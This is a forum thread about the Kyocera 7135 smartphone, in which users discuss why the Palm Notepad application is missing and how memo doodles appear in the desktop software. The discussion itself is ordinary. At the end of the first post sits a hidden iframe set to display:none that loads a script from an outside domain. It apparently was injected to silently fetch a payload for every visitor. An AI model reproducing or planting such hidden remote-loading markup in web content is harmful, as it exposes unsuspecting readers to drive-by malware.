+ Reply to Thread

Thread: note pad 7135?

note pad 7135?

This has probably been asked before but I can't find anything on it by searching.
    The 7135 should have the note pad program, in which you can write notes on the screen and also see them in the desktop software. I found the memo functions to do this, but cannot find the note pad program on the 7135. I see the icon on the desktop software, but cannot seem to figure it out on the phone. I can see the name of the memo's I write on the desktop, but not the graphics. I think I am missing somethign very obvious, but can't figure it out. Anyone have any thoughts???

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: note pad 7135?

Originally posted by fxguy
    This has probably been asked before but I can't find anything on it by searching.
    The 7135 should have the note pad program, in which you can write notes on the screen and also see them in the desktop software. I found the memo functions to do this, but cannot find the note pad program on the 7135. I see the icon on the desktop software, but cannot seem to figure it out on the phone. I can see the name of the memo's I write on the desktop, but not the graphics. I think I am missing somethign very obvious, but can't figure it out. Anyone have any thoughts???

Thanks!
    For some reason, Kyocera did not include this application in the 7135. They combined the function into the memo application, but you can't see the memo's (or hear voice memo's) on the desktop.

Alan

note pad 7135

Please forgive me if I am misunderstanding your question and Alanb's reply.

The memo is shown on the desktop if you hit the "SHOW DETAILS" button in the upper right corner under the "USER NAME" box.

If this isn't the answer to the question------NEVER MIND!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Re: note pad 7135

Originally posted by Krazman
    Please forgive me if I am misunderstanding your question and Alanb's reply.

The memo is shown on the desktop if you hit the "SHOW DETAILS" button in the upper right corner under the "USER NAME" box.

If this isn't the answer to the question------NEVER MIND!
    Different application. Notepad is a Palm application that was introduced in release 4 or 4.1 that is similar to the doodle component of the 7135's memo application. Difference is, the doodles could be synced with and viewed from the Palm desktop application.

Alan

Has anyone tried beaming the Palm Notepad application to the 7135 and trying to sync it to the Desktop?
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.